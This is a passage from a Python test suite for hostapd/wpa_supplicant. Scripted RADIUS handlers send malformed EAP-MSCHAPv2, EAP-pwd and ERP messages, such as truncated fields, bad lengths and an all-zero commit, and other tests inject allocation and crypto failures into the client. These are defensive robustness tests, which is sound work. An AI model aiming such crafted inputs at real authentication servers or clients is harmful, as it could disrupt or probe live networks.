                ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on password request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
                # TODO: Does this work correctly?
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            if i in [ 4, 5, 6, 7, 14 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                # Brief settle time before tearing the network down.
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
    finally:
        stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
    """EAP-MSCHAPv2 protocol tests (error paths)"""
    check_eap_capa(dev[0], "MSCHAPV2")

    def mschapv2_fail_password_expired(ctx):
        # Failure request carrying E=648 (password expired); this drives the
        # peer into the MS-CHAPv2 Change-Password exchange.
        logger.info("Test: Failure before challenge - password expired")
        payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
        return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 4 + len(payload),
                           EAP_TYPE_MSCHAPV2,
                           4, 0, 4 + len(payload)) + payload

    def mschapv2_success_after_password_change(ctx, req=None):
        # Success request; when a full 591-byte Change-Password packet was
        # received, derive the authenticator response from its fields,
        # otherwise fall back to a canned (bogus) success value.
        logger.info("Test: Success after password change")
        if req is None or len(req) != 591:
            payload = "S=1122334455667788990011223344556677889900"
        else:
            # Walk the Change-Password payload with an explicit offset
            # instead of repeatedly re-slicing the buffer.
            pos = 9
            enc_pw = req[pos:pos + 516]
            pos += 516
            enc_hash = req[pos:pos + 16]
            pos += 16
            peer_challenge = req[pos:pos + 16]
            pos += 16
            # Skip the 8 reserved octets
            pos += 8
            nt_response = req[pos:pos + 24]
            pos += 24
            flags = req[pos:]
            logger.info("enc_hash: " + enc_hash.encode("hex"))
            logger.info("peer_challenge: " + peer_challenge.encode("hex"))
            logger.info("nt_response: " + nt_response.encode("hex"))
            logger.info("flags: " + flags.encode("hex"))
            auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
            logger.info("auth_challenge: " + auth_challenge.encode("hex"))
            auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
                                                      peer_challenge,
                                                      auth_challenge, "user")
            payload = "S=" + auth_resp.encode('hex').upper()
        return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 4 + len(payload),
                           EAP_TYPE_MSCHAPV2,
                           3, 0, 4 + len(payload)) + payload

    def mschapv2_handler(ctx, req):
        logger.info("mschapv2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # The scripted sequence is nine identical rounds of three messages:
        # password-expired failure, success-after-change, then EAP-Failure.
        step = ctx['num'] - 1
        if step < 9 * 3:
            phase = step % 3
            if phase == 0:
                return mschapv2_fail_password_expired(ctx)
            if phase == 1:
                return mschapv2_success_after_password_change(ctx, req)
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None

    srv = start_radius_server(mschapv2_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])

        def run_attempt(trigger_cmd, **conn_args):
            # One connection attempt: start authentication, feed in the new
            # password when requested, wait for the instrumented failure to
            # fire, then tear the network down.
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MSCHAPV2", identity="user",
                           wait_connect=False, **conn_args)
            ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
            if ev is None:
                raise Exception("Timeout on new password request")
            id = ev.split(':')[0].split('-')[-1]
            dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
            time.sleep(0.1)
            wait_fail_trigger(dev[0], trigger_cmd)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)

        # Forced crypto/RNG failures with a plaintext password
        for func in [ "os_get_random;eap_mschapv2_change_password",
                      "generate_nt_response;eap_mschapv2_change_password",
                      "get_master_key;eap_mschapv2_change_password",
                      "nt_password_hash;eap_mschapv2_change_password",
                      "old_nt_password_hash_encrypted_with_new_nt_password_hash" ]:
            with fail_test(dev[0], 1, func):
                run_attempt("GET_FAIL", password="password")

        # Forced crypto failures with the password given as an NT hash
        for func in [ "encrypt_pw_block_with_password_hash;eap_mschapv2_change_password",
                      "nt_password_hash;eap_mschapv2_change_password",
                      "nt_password_hash;eap_mschapv2_success" ]:
            with fail_test(dev[0], 1, func):
                run_attempt("GET_FAIL",
                            password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c")

        # Forced allocation failure while building the Change-Password message
        for func in [ "eap_msg_alloc;eap_mschapv2_change_password" ]:
            with alloc_fail(dev[0], 1, func):
                run_attempt("GET_ALLOC_FAIL", password="password")
    finally:
        stop_radius_server(srv)
def test_eap_proto_pwd(dev, apdev):
    """EAP-pwd protocol tests

    A scripted RADIUS server replies to each EAP message with the next
    canned EAP-pwd message (fragmentation corner cases, malformed id/
    commit/confirm exchanges, and some valid steps). The main loop keeps
    reconnecting until the handler reports that the whole sequence has been
    consumed.
    """
    check_eap_capa(dev[0], "PWD")
    # Module-level flags shared between the handler (running in the RADIUS
    # server context) and the connection loop below:
    #   eap_proto_pwd_test_done - set when the scripted sequence is exhausted
    #   eap_proto_pwd_test_wait - set when the handler expects the exchange
    #       to continue, so the loop delays teardown until it clears
    global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
    eap_proto_pwd_test_done = False
    eap_proto_pwd_test_wait = False
    def pwd_handler(ctx, req):
        # ctx['num'] counts received EAP messages and selects which canned
        # reply (idx) to send; ctx['id'] tracks the EAP identifier.
        logger.info("pwd_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        global eap_proto_pwd_test_wait
        eap_proto_pwd_test_wait = False
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
                               EAP_TYPE_PWD)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing Total-Length field")
            payload = struct.pack("B", 0x80)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large Total-Length")
            payload = struct.pack(">BH", 0x80, 65535)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: First fragment")
            payload = struct.pack(">BH", 0xc0, 10)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Total-Length value in the second fragment")
            payload = struct.pack(">BH", 0x80, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: First and only fragment")
            payload = struct.pack(">BH", 0x80, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: First and only fragment with extra data")
            payload = struct.pack(">BHB", 0x80, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: First fragment")
            payload = struct.pack(">BHB", 0xc0, 2, 1)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Extra data in the second fragment")
            payload = struct.pack(">BBB", 0x0, 2, 3)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short id exchange")
            payload = struct.pack(">B", 0x01)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported rand func in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported prf in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported password pre-processing technique in id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected commit exchange")
            payload = struct.pack(">B", 0x02)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Commit payload length")
            payload = struct.pack(">B", 0x02)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
            payload = struct.pack(">B", 0x02) + 96*'\0'
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Commit payload with valid values")
            # Pre-computed commit values: 64-octet element (two curve
            # coordinates) and 32-octet scalar for the group advertised in
            # the preceding id exchange.
            element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
            scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
            payload = struct.pack(">B", 0x02) + element + scalar
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Confirm payload length 0")
            payload = struct.pack(">B", 0x03)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Valid id exchange")
            payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            eap_proto_pwd_test_wait = True
            logger.info("Test: Commit payload with valid values")
            element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
            scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
            payload = struct.pack(">B", 0x02) + element + scalar
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Confirm payload with incorrect value")
            payload = struct.pack(">B", 0x03) + 32*'\0'
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected confirm exchange")
            payload = struct.pack(">B", 0x03)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + len(payload), EAP_TYPE_PWD) + payload
        logger.info("No more test responses available - test case completed")
        global eap_proto_pwd_test_done
        eap_proto_pwd_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(pwd_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Keep reconnecting until the handler has served its full sequence.
        i = 0
        while not eap_proto_pwd_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PWD", identity="pwd user",
                           password="secret password",
                           wait_connect=False)
            # Accept either method-proposal or a completed-failure status as
            # evidence that EAP processing took place for this iteration.
            ok = False
            for j in range(5):
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
                                        "CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                       timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP start")
                if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
                    ok = True
                    break
                if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
                    ok = True
                    break
            if not ok:
                raise Exception("Expected EAP event not seen")
            # If the handler expects the exchange to continue, give it up to
            # a second before tearing the network down.
            if eap_proto_pwd_test_wait:
                for k in range(10):
                    time.sleep(0.1)
                    if not eap_proto_pwd_test_wait:
                        break
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_pwd_errors(dev, apdev):
    """EAP-pwd local error cases

    Forces allocation and crypto failures at specific points inside the
    EAP-pwd peer implementation and verifies that each connection attempt
    fails cleanly.
    """
    check_eap_capa(dev[0], "PWD")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)

    def start_conn(**kwargs):
        # Begin an EAP-pwd connection attempt without waiting for the
        # connection to complete.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PWD", identity="pwd user",
                       password="secret password",
                       wait_connect=False, **kwargs)

    def wait_eap_start():
        if dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                             timeout=15) is None:
            raise Exception("Timeout on EAP start")

    def wait_alloc_fail_hit():
        # Poll the instrumentation counter until the forced allocation
        # failure has been consumed.
        for _ in range(10):
            if dev[0].request('GET_ALLOC_FAIL').startswith('0:'):
                break
            time.sleep(0.1)
        else:
            raise Exception("No allocation failure seen")

    def cleanup():
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Allocation failures while initializing the method instance
    for count in range(1, 4):
        with alloc_fail(dev[0], count, "eap_pwd_init"):
            start_conn()
            if dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                 timeout=15) is None:
                raise Exception("Timeout on EAP start")
            cleanup()

    # Session-Id derivation failure after a successful connection
    with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PWD", identity="pwd user",
                       fragment_size="0",
                       password="secret password")
        cleanup()

    # Key derivation failures
    for fn in [ "eap_pwd_getkey", "eap_pwd_get_emsk" ]:
        with alloc_fail(dev[0], 1, fn):
            start_conn(erp="1")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            cleanup()

    # Allocation failures within the id exchange
    for count in range(1, 7):
        with alloc_fail(dev[0], count, "eap_pwd_perform_id_exchange"):
            start_conn()
            wait_eap_start()
            wait_alloc_fail_hit()
            cleanup()

    with alloc_fail(dev[0], 1, "wpabuf_alloc;eap_pwd_perform_id_exchange"):
        start_conn()
        wait_eap_start()
        cleanup()

    # Allocation failures within the commit exchange
    for count in range(1, 4):
        with alloc_fail(dev[0], count, "eap_pwd_perform_commit_exchange"):
            start_conn()
            wait_eap_start()
            wait_alloc_fail_hit()
            cleanup()

    # Allocation failures within the confirm exchange
    for count in range(1, 12):
        with alloc_fail(dev[0], count, "eap_pwd_perform_confirm_exchange"):
            start_conn()
            wait_eap_start()
            wait_alloc_fail_hit()
            cleanup()

    # Allocation failures while building outgoing fragmented messages
    for count in range(1, 5):
        with alloc_fail(dev[0], count, "eap_msg_alloc;=eap_pwd_process"):
            start_conn(fragment_size="50")
            wait_eap_start()
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            cleanup()

    # No password configured
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="PWD", identity="pwd user",
                   wait_connect=False)
    if dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
                         timeout=15) is None:
        raise Exception("EAP-pwd not started")
    cleanup()

    # Forced hash failure with the password given as an NT hash
    with fail_test(dev[0], 1,
                   "hash_nt_password_hash;eap_pwd_perform_id_exchange"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PWD", identity="pwd-hash",
                       password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
                       wait_connect=False)
        if dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10) is None:
            raise Exception("No EAP-Failure reported")
        cleanup()

    # Second AP using a small fragment size to exercise reassembly
    params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
               "rsn_pairwise": "CCMP", "ieee8021x": "1",
               "eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
               "pwd_group": "19", "fragment_size": "40" }
    hostapd.add_ap(apdev[1]['ifname'], params)
    with alloc_fail(dev[0], 1, "wpabuf_alloc;=eap_pwd_process"):
        dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PWD", identity="pwd user",
                       password="secret password",
                       wait_connect=False)
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        cleanup()
def test_eap_proto_erp(dev, apdev):
    """ERP protocol tests

    Drives the peer's EAP Re-authentication Protocol (ERP, RFC 6696) parser
    through a scripted sequence of malformed EAP-Initiate/Re-auth-Start and
    EAP-Finish/Re-auth messages served by a local RADIUS server.
    """
    check_erp_capa(dev[0])
    global eap_proto_erp_test_done
    eap_proto_erp_test_done = False
    def erp_handler(ctx, req):
        # Scripted RADIUS-side EAP handler: each invocation returns the next
        # (mostly malformed) ERP message from the sequence below. ctx
        # persists across calls; 'num' counts invocations. req is the raw
        # EAP message from the peer (Python 2 str, hence encode("hex")).
        logger.info("erp_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is bumped before each case so invocation N selects test case N.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing type")
            # Bare EAP header (code, id, length=4) with no Type octet
            return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected type")
            return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing Reserved field")
            return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
                               EAP_ERP_TYPE_REAUTH_START)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Zero-length TVs/TLVs")
            payload = ""
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short TLV")
            # TLV type octet present but Length octet missing
            payload = struct.pack("B", 191)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated TLV")
            # TLV claims one octet of value but none follows
            payload = struct.pack("BB", 191, 1)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
            payload = struct.pack("BBB", 191, 0, 192)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: More than one keyName-NAI")
            payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
                                  EAP_ERP_TLV_KEYNAME_NAI, 0)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short TLV keyName-NAI")
            payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated TLV keyName-NAI")
            payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
            # rRK lifetime carries a full 32-bit value; the rMSK TV has only
            # 16 of the required 32 bits
            payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
                                  EAP_ERP_TV_RMSK_LIFETIME, 0)
            return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
                               4 + 1 + 1 + len(payload),
                               EAP_ERP_TYPE_REAUTH_START, 0) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing type (Finish)")
            return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected type (Finish)")
            return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing fields (Finish)")
            return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
                               EAP_ERP_TYPE_REAUTH)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected SEQ (Finish)")
            # SEQ 0xffff does not match any outstanding re-auth exchange
            return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
                               4 + 1 + 4,
                               EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)
        # Scripted sequence exhausted: flag completion so the driver loop
        # below stops iterating.
        logger.info("No more test responses available - test case completed")
        global eap_proto_erp_test_done
        eap_proto_erp_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(erp_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        # Re-connect repeatedly; each EAP exchange consumes the next test
        # message from erp_handler until the sequence is done.
        while not eap_proto_erp_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="pax.user@example.com",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_fast_errors(dev, apdev):
    """EAP-FAST local error cases

    Exercises the peer-side EAP-FAST error paths: allocation/test-failure
    injection at specific internal functions, phase 2 restrictions during
    unauthenticated provisioning, a wrong phase 2 password, and a set of
    malformed PAC file contents supplied via config blobs.
    """
    check_eap_capa(dev[0], "FAST")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failures while initializing the EAP-FAST method
    for i in range(1, 5):
        with alloc_fail(dev[0], i, "eap_fast_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="FAST", anonymous_identity="FAST",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                           phase1="fast_provisioning=2",
                           pac_file="blob://fast_pac_auth",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Allocation failures during authenticated provisioning
    # (count, failing function) pairs
    tests = [ (1, "wpabuf_alloc;eap_fast_tlv_eap_payload"),
              (1, "eap_fast_derive_key;eap_fast_derive_key_auth"),
              (1, "eap_msg_alloc;eap_peer_tls_phase2_nak"),
              (1, "wpabuf_alloc;eap_fast_tlv_result"),
              (1, "wpabuf_alloc;eap_fast_tlv_pac_ack"),
              (1, "=eap_peer_tls_derive_session_id;eap_fast_process_crypto_binding"),
              (1, "eap_peer_tls_decrypt;eap_fast_decrypt"),
              (1, "eap_fast_getKey"),
              (1, "eap_fast_get_session_id"),
              (1, "eap_fast_get_emsk") ]
    for count, func in tests:
        # Start from an empty PAC blob for each iteration
        dev[0].request("SET blob fast_pac_auth_errors ")
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="FAST", anonymous_identity="FAST",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                           phase1="fast_provisioning=2",
                           pac_file="blob://fast_pac_auth_errors",
                           erp="1",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Allocation failures during unauthenticated (anonymous) provisioning
    tests = [ (1, "eap_fast_derive_key;eap_fast_derive_key_provisioning"),
              (1, "eap_mschapv2_getKey;eap_fast_get_phase2_key"),
              (1, "=eap_fast_use_pac_opaque"),
              (1, "eap_fast_copy_buf"),
              (1, "=eap_fast_add_pac"),
              (1, "=eap_fast_init_pac_data"),
              (1, "=eap_fast_write_pac"),
              (2, "=eap_fast_write_pac") ]
    for count, func in tests:
